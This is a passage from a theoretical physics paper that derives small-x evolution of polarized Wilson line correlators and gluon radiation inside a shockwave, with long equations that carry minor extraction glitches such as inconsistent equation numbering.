\[\epsilon^{ij}\mathbf{p}^{i}\int_{\mathbf{x}_{1},\mathbf{x}^{\prime}_{1}}e^{-i \mathbf{p}_{1}\cdot(\mathbf{x}_{1}-\mathbf{x}^{\prime}_{1})}\frac{(\mathbf{x} ^{\prime}_{1}-\mathbf{x}_{1})^{j}}{|\mathbf{x}^{\prime}_{1}-\mathbf{x}_{1}|^{ 2}}\langle\mathrm{Tr}[U_{\mathbf{x}_{1}}U^{\dagger}_{\mathbf{x}^{\prime}_{1}}] \rangle=0. \tag{4.10}\] Eq. (4.5) is expressed in terms of the polarized Wilson line with spatial index \[U^{iG[2]}_{\mathbf{x}_{1}}(k^{+})= \frac{1}{2k^{+}}\int_{-\infty}^{+\infty}dx^{+}_{1}U_{\mathbf{x}_{ 1}}[+\infty,x^{+}_{1}]\frac{1}{2}\Big{[}\overrightarrow{\mathcal{D}}^{i}_{ \mathbf{x}_{1}}-\overleftarrow{\mathcal{D}}^{i}_{\mathbf{x}_{1}}\Big{]}U_{ \mathbf{x}_{1}}[x^{+}_{1},-\infty]. \tag{4.11}\] Using the identity \[\int_{x^{+}_{0}}^{x^{+}}dz^{+}U_{\mathbf{x}}(x^{+},z^{+})f^{-i}(z^ {+},\mathbf{x})U_{\mathbf{x}}(z^{+},x^{+}_{0}) \tag{4.12}\] \[= a^{i}(x^{+},\mathbf{x})U_{\mathbf{x}}(x^{+},x^{+}_{0})-U_{ \mathbf{x}}(x^{+},x^{+}_{0})a^{i}(x^{+}_{0},\mathbf{x})+\frac{1}{ig}\partial^ {i}U_{\mathbf{x}}(x^{+},x^{+}_{0}),\] eq. (4.11) can be reexpressed as [19; 21] \[U^{iG[2]}_{\mathbf{x}_{1}}(k^{+})=-\frac{ig}{2k^{+}}\int_{-\infty}^{+\infty} dx^{+}_{1}x^{+}_{1}U_{\mathbf{x}_{1}}(+\infty,x^{+}_{1})f^{-i}(x^{+}_{1}, \mathbf{x}_{1})U_{\mathbf{x}_{1}}(x^{+}_{1},-\infty), \tag{4.13}\] which clearly shows that \(U^{iG[2]}_{\mathbf{x}_{1}}(k^{+})\) is determined by the chromo-electric field \(f^{-i}(x^{+}_{1},\mathbf{x}_{1})\). One can repeat the calculation for the second diagram in Fig. 4, it vanishes because of \(\mathrm{Tr}[U^{i\,G[2]}_{\mathbf{x}_{1}}U^{\dagger}_{\mathbf{x}_{1}}]=0\). Eq. (4.5) is the main result of this section, which clearly shows that gluon radiation inside the shockwave contribute to longitudinal double-spin asymmetry in soft gluon production. Furthermore, its contribution is in the form of chromo-electrically polarized Wilson line correlator. ### Small \(x\) evolution of polarized Wilson line correlator In this section, we calculate the amplitude shown in Fig. 5. They come from one step rapidity evolution of the chromo-magnetically polarized gluon dipole correlator \(\langle\mathrm{Tr}[U^{G[1]}_{\mathbf{x}_{1}}U^{\dagger}_{\mathbf{x}_{2}}]\rangle\). The two diagrams represent contributions from gluon radiation inside the shockwave. We use two different methods to do the calculations. One is an operator treatment that was used by many groups [12; 23; 31]. The other method is to directly compute the two diagrams. #### 4.2.1 Operator treatment We begin with the definition of the chromo-magnetically polarized gluon Wilson line correlator \[\left\langle\mathrm{Tr}\left[U^{G[1]}_{\mathbf{x}_{1}}U^{\dagger}_{\mathbf{x}_{ 2}}\right]\right\rangle(k^{+})=-\frac{2ig}{2k^{+}}\int_{-\infty}^{+\infty}dx^ {+}_{1}\left\langle\mathrm{Tr}\left[U_{\mathbf{x}_{1}}[+\infty,x^{+}_{1}]f^{12 }(x^{+}_{1},0^{-},\mathbf{x}_{1})U_{\mathbf{x}_{1}}[x^{+}_{1},-\infty]U^{ \dagger}_{\mathbf{x}_{2}}\right]\right\rangle \tag{4.14}\] he field strength tensor \(f^{12}\) carries longitudinal momentum \(k^{+}\). We decomposed it into a quantum part and a classical part by \(a^{i}(k^{+})\to A^{i}(k^{\prime+})+a^{i}(k^{+}-\delta k^{+})\) with \(k^{+}-\delta k^{+}<k^{\prime+}<k^{+}\). One then integrates out the quantum degrees of freedom \(A^{i}(k^{\prime+})\) in the infinitesimal strip of longitudinal momentum \(\delta k^{+}\). The separation into classical fields and quantum fluctuations is given by \[f^{12}=\frac{1}{2}\epsilon^{ij}f^{ij} \tag{4.15}\] \[= \frac{1}{2}\epsilon^{ij}\Big{(}\partial^{i}a^{j}-\partial^{j}a^ {i}+ig[a^{i},a^{j}]+\partial^{i}A^{j}-\partial^{j}A^{i}+ig[A^{i},A^{j}]+ig[A^ {i},a^{j}]+ig[a^{i},A^{j}]\Big{)}\] \[= \frac{1}{2}\epsilon^{ij}\Big{(}f^{ij}+ig[A^{i},A^{j}]\Big{)}+ \epsilon^{ij}\Big{(}\partial^{i}A^{j}+ig[a^{i},A^{j}]\Big{)}.\] We will focus on the piece \(\epsilon^{ij}(\partial^{i}A^{j}+ig[a^{i},A^{j}])\) which is linear in quantum fluctuating fields. Let the shockwave locate within the narrow range \([-L^{+},L^{+}]\) around \(0^{+}\). We further require that \(-L^{+}<x_{1}^{+}<L^{+}\). In other words, the chromo-magnetic field lies inside the shockwave. The situations that the chromo-magnetic field lies before or after the shockwave have been studied in [12]. The eikonal Wilson line \(U_{\mathbf{x}_{2}}\) also needs to be expanded to linear order in quantum fluctuation field \[U_{\mathbf{x}_{2}}^{mn}\simeq-ig\int_{-\infty}^{+\infty}dx_{2}^{+}U_{\mathbf{x }_{2}}[+\infty,x_{2}^{+}]A^{-}(x_{2}^{+},0^{-},\mathbf{x}_{2})U_{\mathbf{x}_{ 2}}[x_{2}^{+},-\infty] \tag{4.16}\] We consider two options for the ordering of \(x_{2}^{+}\) with respect to \([-L^{+},L^{+}]\). One is that \(x_{2}^{+}>L^{+}\) and the other is \(x_{2}^{+}<-L^{+}\), corresponding to the two diagrams in Fig. 5, respectively. Then Eq. (4.14), in reference to Fig. 5, can be written as the sum of the two cases \[\mathcal{M}_{\text{I}}= \frac{2g^{2}}{2k^{+}}\epsilon^{ij}\int_{-\infty}^{+\infty}dx_{1} ^{+}\int_{L^{+}}^{+\infty}dx_{2}^{+}\Big{\langle}\text{Tr}\Big{[}U_{\mathbf{ x}_{1}}[+\infty,x_{1}^{+}]\left(\partial^{i}A^{j}+ig[a^{i},A^{j}]\right)U_{ \mathbf{x}_{1}}[x_{1}^{+},-\infty] \tag{4.17}\] \[\qquad\times U_{\mathbf{x}_{2}}^{\dagger}[x_{2}^{+},-\infty]A^{- }(x_{2}^{+},0^{-},\mathbf{x}_{2})\Big{]}\Big{\rangle}\] Figure 5: The single logarithmic contribution to small \(x\) evolution of \(\langle\text{Tr}[U_{\mathbf{x}_{1}}^{G[1]}U_{\mathbf{x}_{2}}^{\dagger}]\rangle\). The red gluon lines represent the background gluon fields. and \[\begin{split}\mathcal{M}_{\rm II}=&\frac{2g^{2}}{2k^{+}} \epsilon^{ij}\int_{-\infty}^{+\infty}dx_{1}^{+}\int_{-\infty}^{-L^{+}}dx_{2}^{+} \Big{\langle}{\rm Tr}\Big{[}U_{{\bf x}_{1}}[+\infty,x_{1}^{+}]\left(\partial^{ i}A^{j}+ig[a^{i},A^{j}]\right)U_{{\bf x}_{1}}[x_{1}^{+},-\infty]\\ &\qquad\qquad\times A^{-}(x_{2}^{+},0^{-},{\bf x}_{2})U_{{\bf x} _{2}}^{\dagger}[+\infty,x_{2}^{+}]\Big{]}\Big{\rangle}.\end{split} \tag{4.18}\] The calculation of these two expressions follows very similar analysis. We first calculate \(\mathcal{M}_{\rm I}\), which can be written as \[\begin{split}\mathcal{M}_{\rm I}=&\frac{2g^{2}}{2k^ {+}}\epsilon^{ij}\int_{-\infty}^{+\infty}dx_{1}^{+}\int_{L^{+}}^{+\infty}dx_{2 }^{+}\Big{\langle}{\rm Tr}\Big{[}U_{{\bf x}_{1}}[+\infty,x_{1}^{+}]T^{e}U_{{ \bf x}_{1}}[x_{1}^{+},-\infty]U_{{\bf x}_{2}}^{\dagger}T^{b}\Big{]}\Big{\rangle} \\ &\qquad\times\Big{(}\delta_{ed}\partial_{{\bf x}_{1}}^{i}-gf^{ ecd}a_{c}^{i}(x_{1}^{+},0^{-},{\bf x}_{1})\Big{)}\,\Big{\langle}A_{d}^{j}(x_{1}^{+},0^{-},{\bf x}_{1})A_{b}^{-}(x_{2}^{+},0^{-},{\bf x}_{2})\Big{\rangle}.\end{split} \tag{4.19}\] Because of \(x_{2}^{+}>L^{+}\), we have set \(U_{{\bf x}_{2}}^{\dagger}[x_{2}^{+},-\infty]=U_{{\bf x}_{2}}^{\dagger}[+\infty,-\infty]\equiv U_{{\bf x}_{2}}^{\dagger}\). The quantum flucations need to be averaged out by computing the two field correlation function in the background field \[\begin{split}&\int_{L^{+}}^{+\infty}dx_{2}^{+}\,\Big{\langle}A_{d}^{ j}(x_{1}^{+},0^{-},{\bf x}_{1})A_{b}^{-}(x_{2}^{+},0^{-},{\bf x}_{2})\Big{\rangle} \\ =&\int_{L^{+}}^{+\infty}dx_{2}^{+}\,\Big{\langle}0 \,\Big{|}A_{b}^{-}(x_{2}^{+},0^{-},{\bf x}_{2})\hat{S}(L^{+},x_{1}^{+})A_{d}^{ j}(x_{1}^{+},0^{-},{\bf x}_{1})\Big{|}\,0\Big{\rangle}\,.\end{split} \tag{4.20}\] The interaction with the shockwave only happens within the range \([L^{+},x_{1}^{+}]\). Substituting the mode expansions for the fields \(A^{j}\) and \(A^{+}\) and using eikonal transformation of gluon creation operator \[\hat{S}(L^{+},x_{1}^{+})\hat{a}_{d,\lambda_{1}}^{\dagger}(p_{1},{\bf p}_{1}) \hat{S}^{\dagger}(L^{+},x_{1}^{+})=\int d^{2}{\bf w}_{1}e^{i{\bf p}_{1}\cdot{ \bf w}_{1}}\hat{a}_{h,\lambda_{1}}^{\dagger}(p_{1}^{-},{\bf w}_{1})U_{{\bf w}_ {1}}^{hd}(L^{+},x_{1}^{+}), \tag{4.21}\] the two field correlator in eq. (4.20) can be computed as \[\begin{split}&\int_{L^{+}}^{+\infty}dx_{2}^{+}\Big{\langle}0 \Big{|}A_{b}^{-}(x_{2}^{+},0^{-},{\bf x}_{2})\hat{S}(L^{+},x_{1}^{+})A_{d}^{j} (x_{1}^{+},0^{-},{\bf x}_{1})\Big{|}0\Big{\rangle}\\ =&\int_{L^{+}}^{+\infty}dx_{2}^{+}\sum_{\lambda_{1}, \lambda_{2}}\int_{p_{1}^{+},p_{2}^{+},{\bf p}_{1},{\bf p}_{2}}\Big{[}e^{-i\frac {{\bf p}_{2}^{2}}{2p_{2}^{2}}x_{2}^{+}}e^{i{\bf p}_{2}\cdot{\bf x}_{2}}e^{i \frac{{\bf p}_{1}^{2}}{2p_{1}^{2}}x_{1}^{+}}e^{-i{\bf p}_{1}\cdot{\bf x}_{1}} \varepsilon_{\lambda_{2}}^{-}(p_{2}^{+},{\bf p}_{2})\varepsilon_{\lambda_{1}}^ {j*}(p_{1}^{+},{\bf p}_{1})\\ &\times\int d{\bf w}_{2}d{\bf w}_{1}e^{-i{\bf p}_{2}\cdot{\bf w} _{2}}e^{i{\bf p}_{1}\cdot{\bf w}_{1}}U_{{\bf w}_{1}}^{hd}(L^{+},x_{1}^{+}) \left[\delta_{bh}\,\delta_{\lambda_{1}\lambda_{2}}(2\pi)2p_{1}^{+}\delta(p_{1} ^{+}-p_{2}^{+})\delta^{(2)}({\bf w}_{1}-{\bf w}_{2})\right]\\ =&\int_{{\bf p}_{2},{\bf p}_{1},p_{1}^{+}_{1}}\Big{[}e ^{-i\frac{{\bf p}_{2}^{2}}{2p_{1}^{2}}L^{+}}e^{i{\bf p}_{2}\cdot{\bf x}_{2}}e^{i \frac{{\bf p}_{1}^{2}}{2p_{1}^{2}}x_{1}^{+}}e^{-i{\bf p}_{1}\cdot{\bf x}_{1}}(- i)\frac{2{\bf p}_{2}^{2}}{{\bf p}_{2}^{2}}\int d{\bf w}_{1}e^{-i{\bf p}_{2} \cdot{\bf w}_{1}}e^{i{\bf p}_{1}\cdot{\bf w}_{1}}U_{{\bf w}_{1}}^{bd}(L^{+},x_{1 }^{+})\Big{]}\\ =&\int_{p_{1}^{+}}e^{i\frac{{\bf p}_{2}^{2}}{2p_{1}^{ +}}L^{+}}e^{-i\frac{{\bf q}_{1}^{2}}{2p_{1}^{2}}x_{1}^{+}}\frac{2}{2\pi} \frac{({\bf x}_{2}-{\bf x}_{1})^{j}}{|{\bf x}_{2}-{\bf x}_{1}|^{2}}U_{{\bf x}_{ 1}}^{bd}(L^{+},x_{1}^{+})\\ \simeq&\int_{\delta k^{+}}\,\frac{dp_{1}^{+}}{p_{1}^{+ }}\frac{1}{(2\pi)^{2}}\frac{({\bf x}_{2}-{\bf x}_{1})^{j}}{|{\bf x}_{2}-{\bf x }_{1}|^{2}}U_{{\bf x}_{1}}^{bd}(L^{+},x_{1}^{+}).\end{split} \tag{4.22}\] In obtaining the last equality, we have ignored the phase factors as they will introduce higher order eikonality contributions. The integration over the longitudinal momentum is restricted within the infinitesimal range \(\delta k^{+}\). In obtaining the second equality, we have carried out the integrals of \(p_{2}^{+}\) and \(x_{2}^{+}\). The integration over \(x_{2}^{+}\) is given by \[\int_{L^{+}}^{+\infty}dx_{2}^{+}e^{-i\frac{\mathbf{p}_{2}^{2}}{2p_{2}^{+}}x_{2 }^{+}}=-i\frac{2p_{2}^{+}}{\mathbf{p}_{2}^{2}}e^{-i\frac{\mathbf{p}_{2}^{2}}{2p _{2}^{+}}L^{+}}. \tag{119}\] Taking into account of eq. (118), the Wilson line structure in eq. (105) can be simplified as \[\begin{split}&\mathrm{Tr}\Big{[}T^{b}U_{\mathbf{x}_{1}}[+\infty,x_{1}^ {+}]T^{e}U_{\mathbf{x}_{1}}[x_{1}^{+},-\infty]U_{\mathbf{x}_{2}}^{\dagger} \Big{]}\partial_{\mathbf{x}_{1}}^{i}U_{\mathbf{x}_{1}}^{be}[+\infty,x_{1}^{+}] \\ =& N_{c}\mathrm{Tr}\Big{[}\partial_{\mathbf{x}_{1}} ^{i}U_{\mathbf{x}_{1}}[+\infty,x_{1}^{+}]U_{\mathbf{x}_{1}}[x_{1}^{+},-\infty ]U_{\mathbf{x}_{2}}^{\dagger}\Big{]}-\mathrm{Tr}\Big{[}T^{b}\partial_{\mathbf{ x}_{1}}^{i}U_{\mathbf{x}_{1}}[+\infty,x_{1}^{+}]U_{\mathbf{x}_{1}}[x_{1}^{+},- \infty]T^{d}U_{\mathbf{x}_{2}}^{\dagger}\Big{]}U_{\mathbf{x}_{1}}^{bd}\\ =&\frac{1}{2}N_{c}\mathrm{Tr}\Big{[}\partial_{ \mathbf{x}_{1}}^{i}U_{\mathbf{x}_{1}}[+\infty,x_{1}^{+}]U_{\mathbf{x}_{1}}[x_{ 1}^{+},-\infty]U_{\mathbf{x}_{2}}^{\dagger}\Big{]}.\end{split} \tag{120}\] We have used the color identity \(T^{d}T^{e}T^{d}=\frac{1}{2}N_{c}T^{e}\) in obtaining the last equality. On the other hand, one has \[\begin{split}&\mathrm{Tr}\Big{[}T^{b}U_{\mathbf{x}_{1}}[+\infty,x_{1}^ {+}]T^{e}U_{\mathbf{x}_{1}}[x_{1}^{+},-\infty]U_{\mathbf{x}_{2}}^{\dagger} \Big{]}f^{ecd}U_{\mathbf{x}_{1}}^{bd}[+\infty,x_{1}^{+}]\\ =&\frac{1}{2}iN_{c}\mathrm{Tr}\Big{[}U_{\mathbf{x}_{ 1}}[+\infty,x_{1}^{+}]T^{c}U_{\mathbf{x}_{1}}[x_{1}^{+},-\infty]U_{\mathbf{x}_ {2}}^{\dagger}\Big{]}.\end{split} \tag{121}\] The final result for \(\mathcal{M}_{\mathrm{I}}\) is \[\mathcal{M}_{\mathrm{I}}=2g^{2}N_{c}\int_{\delta k^{+}}\frac{dp_{1}^{+}}{p_{1 }^{+}}\frac{1}{(2\pi)^{2}}\frac{\epsilon^{ij}(\mathbf{x}_{2}-\mathbf{x}_{1})^ {j}}{|\mathbf{x}_{2}-\mathbf{x}_{1}|^{2}}\frac{1}{2k^{+}}\frac{1}{2}\int_{- \infty}^{+\infty}dx_{1}^{+}\mathrm{Tr}\Big{[}U_{\mathbf{x}_{1}}[+\infty,x_{1} ^{+}]\overleftarrow{\mathcal{D}}_{\mathbf{x}_{1}}^{i}U_{\mathbf{x}_{1}}[x_{1}^ {+},-\infty]U_{\mathbf{x}_{2}}^{\dagger}\Big{]}. \tag{122}\] We carry out similar analysis for the second diagram in Fig. 5. Its expression is (123) The two field correlation function with the ordering \(x_{2}^{+}<x_{1}^{+}\) is computed by \[\begin{split}&\int_{-\infty}^{-L^{+}}dx_{2}^{+}\Big{\langle}A_{b}^{ -}(x_{2}^{+},0^{-},\mathbf{x}_{2})A_{d}^{j}(x_{1}^{+},0^{-},\mathbf{x}_{1}) \Big{\rangle}\\ =&\int_{-\infty}^{-L^{+}}dx_{2}^{+}\int_{p_{1}^{+}, p_{2}^{+},\mathbf{p}_{1},\mathbf{p}_{2}}\Big{[}e^{-i\frac{\mathbf{p}_{1}^{2}}{2p _{1}^{+}}x_{1}^{+}}e^{i\mathbf{p}_{1}\cdot\mathbf{x}_{1}}e^{i\frac{\mathbf{p}_{ 2}^{2}}{2p_{2}^{+}}x_{2}^{+}}e^{-i\mathbf{p}_{2}\cdot\mathbf{x}_{2}}\frac{ \mathbf{p}_{2}^{j}}{p_{2}^{+}}\int d\mathbf{w}_{1}e^{-i\mathbf{p}_{1}\cdot \mathbf{w}_{1}}e^{i\mathbf{p}_{2}\cdot\mathbf{w}_{1}}\\ &\qquad\times(2\pi)2p_{1}^{+}\delta(p_{2}^{+}-p_{1}^{+})U_{ \mathbf{w}_{1}}^{db}(x_{1}^{+},-L^{+})\Big{]}\\ =&\int_{p_{1}^{+}}e^{i\frac{\partial_{\mathbf{x}_{1}} ^{2}}{2p_{1}^{+}}x_{1}^{+}}e^{i\frac{\partial_{\mathbf{x}_{2}}^{2}}{2p_{2}^{+ }}L^{+}}\frac{2}{2\pi}\frac{(\mathbf{x}_{1}-\mathbf{x}_{2})^{j}}{|\mathbf{x}_ {1}-\mathbf{x}_{2}|^{2}}U_{\mathbf{x}_{1}}^{db}(x_{1}^{+},-L^{+})\\ \simeq&-\int_{\delta k^{+}}\frac{dp_{1}^{+}}{p_{1}^{+ }}\frac{1}{(2\pi)^{2}}\frac{(\mathbf{x}_{2}-\mathbf{x}_{1})^{j}}{|\mathbf{x}_ {2}-\mathbf{x}_{1}|^{2}}U_{\mathbf{x}_{1}}^{db}(x_{1}^{+},-L^{+}).\end{split} \tag{124}\] Compared to the corrrelation function obtained in eq. (4.22), an extra minus sign shows up, apart from the difference in Wilson line color indices. We used the integration over \(x_{2}^{+}\), this time from \(-\infty\) to \(-L^{+}\). \[\int_{-\infty}^{-L^{+}}dx_{2}^{+}e^{i\frac{\mathbf{p}_{2}^{2}}{2p_{2}^{2}}x_{2}^ {+}}=-i\frac{2p_{2}^{+}}{\mathbf{p}_{2}^{2}}e^{-i\frac{\mathbf{p}_{2}^{2}}{2p_{2 }^{2}}L^{+}}. \tag{4.29}\] The two Wilson line structures in \(\mathcal{M}_{\rm II}\) become \[\begin{split}&\mathrm{Tr}\Big{[}U_{\mathbf{x}_{1}}[+\infty,x_{1}^{+}] T^{e}U_{\mathbf{x}_{1}}[x_{1}^{+},-\infty]T^{b}U_{\mathbf{x}_{2}}^{\dagger} \Big{]}\partial_{\mathbf{x}_{1}}^{i}U_{\mathbf{x}_{1}}^{eb}(x_{1}^{+},- \infty)\\ =& N_{c}\mathrm{Tr}\Big{[}U_{\mathbf{x}_{1}}[+\infty, x_{1}^{+}]\partial_{\mathbf{x}_{1}}^{i}U_{\mathbf{x}_{1}}[x_{1}^{+},-\infty]U_{ \mathbf{x}_{2}}^{\dagger}\Big{]}-\mathrm{Tr}\Big{[}T^{h}U_{\mathbf{x}_{1}}[+ \infty,x_{1}^{+}]\partial_{\mathbf{x}_{1}}^{i}U_{\mathbf{x}_{1}}[x_{1}^{+},- \infty]T^{b}U_{\mathbf{x}_{2}}^{\dagger}\Big{]}U_{\mathbf{x}_{1}}^{hb}\\ =&\frac{1}{2}N_{c}\mathrm{Tr}\Big{[}U_{\mathbf{x}_{1}} [+\infty,x_{1}^{+}]\partial_{\mathbf{x}_{1}}^{i}U_{\mathbf{x}_{1}}[x_{1}^{+}, -\infty]U_{\mathbf{x}_{2}}^{\dagger}\Big{]}\end{split} \tag{4.30}\] and \[\begin{split}&\mathrm{Tr}\Big{[}U_{\mathbf{x}_{1}}[+\infty,x_{1}^{+}] T^{e}U_{\mathbf{x}_{1}}[x_{1}^{+},-\infty]T^{b}U_{\mathbf{x}_{2}}^{\dagger} \Big{]}U_{\mathbf{x}_{1}}^{db}(x_{1}^{+},-\infty)f^{ecd}\\ =&-\frac{1}{2}iN_{c}\mathrm{Tr}\Big{[}U_{\mathbf{x} _{1}}[+\infty,x_{1}^{+}]T^{c}U_{\mathbf{x}_{1}}[x_{1}^{+},-\infty]U_{\mathbf{ x}_{2}}^{\dagger}\Big{]}.\end{split} \tag{4.31}\] The final result for \(\mathcal{M}_{\rm II}\) is \[\mathcal{M}_{\rm II}=-2g^{2}N_{c}\int_{\delta k^{+}}\frac{dp_{1}^{+}}{p_{1}^{ +}}\frac{1}{(2\pi)^{2}}\frac{\epsilon^{ij}(\mathbf{x}_{2}-\mathbf{x}_{1})^{j} }{|\mathbf{x}_{2}-\mathbf{x}_{1}|^{2}}\frac{1}{2k^{+}}\frac{1}{2}\int_{-\infty }^{+\infty}dx_{1}^{+}\mathrm{Tr}\Big{[}U_{\mathbf{x}_{1}}[+\infty,x_{1}^{+}] \overrightarrow{\mathcal{D}}_{\mathbf{x}_{1}}^{i}U_{\mathbf{x}_{1}}[x_{1}^{+ },-\infty]U_{\mathbf{x}_{2}}^{\dagger}\Big{]} \tag{4.32}\] Summing up \(\mathcal{M}_{\rm I}\) and \(\mathcal{M}_{\rm II}\), one obtains \[\mathcal{M}_{\rm I}+\mathcal{M}_{\rm II}=\frac{2\alpha_{s}N_{c}\Delta y}{\pi} \frac{\epsilon^{ij}(\mathbf{x}_{1}-\mathbf{x}_{2})^{j}}{|\mathbf{x}_{1}- \mathbf{x}_{2}|^{2}}\Big{\langle}\mathrm{Tr}\left[U_{\mathbf{x}_{1}}^{i\Omega [2]}U_{\mathbf{x}_{2}}^{\dagger}\right]\Big{\rangle}. \tag{4.33}\] Eq. (4.33) is the main result of this section. It characterizes that gluon radiation inside the shockwave contributes to the rapidity evolution of chromo-magnetically polarized Wilson line correlator. Interestingly, the contribution is in the form of chromo-electrically polarized Wilson line correlator. It is a single logarithmic contribution \(\int_{\delta k^{+}}dp_{1}^{+}/p_{1}^{+}=\Delta y=\ln\frac{1}{x}\). #### 4.2.2 Directly calculating the diagrams In this section, we directly calculate the two diagrams in Fig. 5. The scattering amplitude for two incoming gluons and two outgoing gluons is calculated by \[\begin{split}&\langle 0|\hat{a}_{c^{\prime},\lambda^{\prime}}(p_{2}^{ \prime+},\mathbf{x}_{2}^{\prime})\hat{a}_{c^{\prime},\lambda^{\prime}}(p_{1}^ {\prime+},\mathbf{x}_{1}^{\prime})\hat{S}(+\infty,-\infty)\hat{a}_{c,\lambda _{2}}^{\dagger}(p_{2}^{+},\mathbf{x}_{2})\hat{a}_{c,\lambda_{1}}^{\dagger}(p_{ 1}^{+},\mathbf{x}_{1})|0\rangle\\ =&\langle 0|\hat{a}_{c^{\prime},\lambda^{\prime}}(p_{2}^{ \prime+},\mathbf{x}_{2}^{\prime})\hat{a}_{c^{\prime},\lambda^{\prime}}(p_{1}^ {\prime+},\mathbf{x}_{1}^{\prime})\hat{S}(+\infty,L^{+})\hat{S}(L^{+},-L^{+}) \hat{a}_{c,\lambda_{2}}^{\dagger}(p_{2}^{+},\mathbf{x}_{2})\hat{a}_{c,\lambda _{1}}^{\dagger}(p_{1}^{+},\mathbf{x}_{1})|0\rangle\\ &+\langle 0|\hat{a}_{c^{\prime},\lambda^{\prime}}(p_{2}^{ \prime+},\mathbf{x}_{2}^{\prime})\hat{a}_{c^{\prime},\lambda^{\prime}}(p_{1}^ {\prime+},\mathbf{x}_{1}^{\prime})\hat{S}(L^{+},-L^{+})\hat{S}(-L^{+},-\infty) \hat{a}_{c,\lambda_{2}}^{\dagger}(p_{2}^{+},\mathbf{x}_{2})\hat{a}_{c,\lambda _{1}}^{\dagger}(p_{1}^{+},\mathbf{x}_{1})|0\rangle\end{split} \tag{4.34}\] The incoming two gluons have the same color indices. The same is true for the two outgoing gluons. The two outgoing gluons also have the same polarization. Repeated indices are summed over. For generality, we keep all the longitudinal momentum and transverse coordinates different. The first term in eq. (4.3), only considering the part corresponding to the first diagram in Fig. 5, is further expressed by \[\langle 0|\hat{a}_{c^{\prime},\lambda^{\prime}}(p_{2}^{\prime+}, \mathbf{x}_{2}^{\prime})\hat{a}_{c^{\prime},\lambda^{\prime}}(p_{1}^{\prime+}, \mathbf{x}_{1}^{\prime})\hat{S}(+\infty,L^{+})\hat{S}(L^{+},-L^{+})\hat{a}_{c, \lambda_{2}}^{\dagger}(p_{2}^{+},\mathbf{x}_{2})\hat{a}_{c,\lambda_{1}}^{ \dagger}(p_{1}^{+},\mathbf{x}_{1})|0\rangle\] \[= \sum_{e,e_{2},\kappa,\kappa_{2}}\int_{q^{+},q^{+},\mathbf{y}^{2},\mathbf{y}^{2},\mathbf{y}}\langle 0|\hat{a}_{c^{\prime},\lambda^{\prime}}(p_{2}^{ \prime+},\mathbf{x}_{2}^{\prime})\hat{S}(+\infty,L^{+})\hat{a}_{e_{2},\kappa_ {2}}^{\dagger}(q^{+},\mathbf{y}_{2})\hat{a}_{e,\kappa}^{\dagger}(q^{+}, \mathbf{y})|0\rangle\] \[\qquad\times\langle 0|\hat{a}_{e_{2},\kappa_{2}}(q_{2}^{+}, \mathbf{y}_{2})\hat{W}(L^{+},-L^{+})\hat{a}_{c,\lambda_{2}}^{\dagger}(p_{2}^{+ },\mathbf{x}_{2})|0\rangle\] \[\qquad\times\langle 0|\hat{a}_{e,\kappa}(q^{+},\mathbf{y})\hat{a}_{c^ {\prime},\lambda^{\prime}}(p_{1}^{\prime+},\mathbf{x}_{1}^{\prime})\hat{S}(L^ {+},-L^{+})\hat{a}_{c,\lambda_{1}}^{\dagger}(p_{1}^{+},\mathbf{x}_{1})|0\rangle\] \[= \sum_{e,\kappa,\kappa}\int_{q^{+},\mathbf{y}}e^{i(p_{2}^{\prime-} -p_{2}^{-}-q^{-}+i\epsilon)L^{+}}\Big{[}\psi_{I}^{g\to gg}(\{p_{2}^{ \prime+},\mathbf{x}_{2}^{\prime},c^{\prime},\lambda^{\prime}\};\{q^{+}, \mathbf{y},e,\kappa\},\{p_{2}^{+},\mathbf{x}_{2},h,\lambda_{2}\})\Big{]}^{*}\] \[\qquad\times U_{\mathbf{x}_{2}}^{hc}(L^{+},-L^{+})M_{3}^{g\to gg }(\{p_{1}^{+},\mathbf{x}_{1},c,\lambda_{1}\};\{q^{+},\mathbf{y},e,\kappa\}, \{p_{1}^{\prime+},\mathbf{x}_{1}^{\prime},c^{\prime},\lambda^{\prime}\}) \tag{4.35}\] We have expanded \(\hat{S}(+\infty,L^{+})\) to linear order in strong coupling constant. The amplitude \(M_{3}^{g\to gg}\) has been computed in eq. (4.3), representing background field induced gluon radiation. Note that we let the gluon \(\{q^{+},\mathbf{y},e,\kappa\}\) be the soft gluon. In the limit that \(q^{+}\ll p_{1}^{+}\), the longitudinal momentum conservation leads to \(p_{1}^{+}=p_{1}^{\prime+}\) as expected for sub-eikonal order processes. We only kept the part of the polarization factor that will eventually give terms linear in the polarization of the incoming gluons. The initial state gluon splitting wavefunction \(\psi_{I}^{g\to gg}\) has also been computed in eq. (B). In the limit that \(q^{+}\ll p_{2}^{+}\), the longitudinal momentum conservation enforces that \(p_{2}^{+}=p_{2}^{\prime+}\). Using these explicit expressions, \(\mathcal{M}_{\rm I}\) becomes \[\mathcal{M}_{\rm I}= \sum_{e,\kappa,\int_{q^{+}}}e^{i(p_{2}^{\prime-}-p_{2}^{-}-q^{-}+ i\epsilon)L^{+}}(-2\lambda_{1}\delta_{\lambda_{1}\lambda_{2}})g^{2}\frac{i}{2\pi} \frac{i\epsilon^{ij}(\mathbf{x}_{1}-\mathbf{x}_{2})^{j}}{|\mathbf{x}_{1}- \mathbf{x}_{2}|^{2}}T^{e}_{c^{\prime}h}U^{hc}_{\mathbf{x}_{2}}(L^{+},-L^{+}) \tag{4.36}\] \[\times\frac{1}{2p_{1}^{+}}\int_{-L^{+}}^{L^{+}}dw^{+}\Big{(}if^{ d\epsilon^{\prime}h^{\prime}}\left[-2\partial_{\mathbf{x}_{1}}^{i}U^{ee^{\prime}}_{ \mathbf{x}_{1}}(L^{+},w^{+})U^{c^{\prime}h^{\prime}}_{\mathbf{x}_{1}}(L^{+},w^ {+})U^{dc}_{\mathbf{x}_{1}}(w^{+},-L^{+})\right]\] \[+iga_{b}^{i}(\mathbf{x}_{1})U^{ee^{\prime}}_{\mathbf{x}_{1}}(L^{ +},w^{+})U^{c^{\prime}h^{\prime}}_{\mathbf{x}_{1}}(L^{+},w^{+})U^{dc}_{ \mathbf{x}_{1}}(w^{+},-L^{+})2(T^{d}T^{e^{\prime}})_{h^{\prime}b}\Big{)}\] We have discarded the factors characterizing longitudinal momentum conservation and transverse coordinate conservation. The Wilson line structures are further simplified \[T^{e}_{c^{\prime}h}U^{hc}_{\mathbf{x}_{2}}(L^{+},-L^{+})if^{d \epsilon^{\prime}h^{\prime}}\left[-2\partial_{\mathbf{x}_{1}}^{i}U^{ee^{ \prime}}_{\mathbf{x}_{1}}(L^{+},w^{+})U^{c^{\prime}h^{\prime}}_{\mathbf{x}_{1} 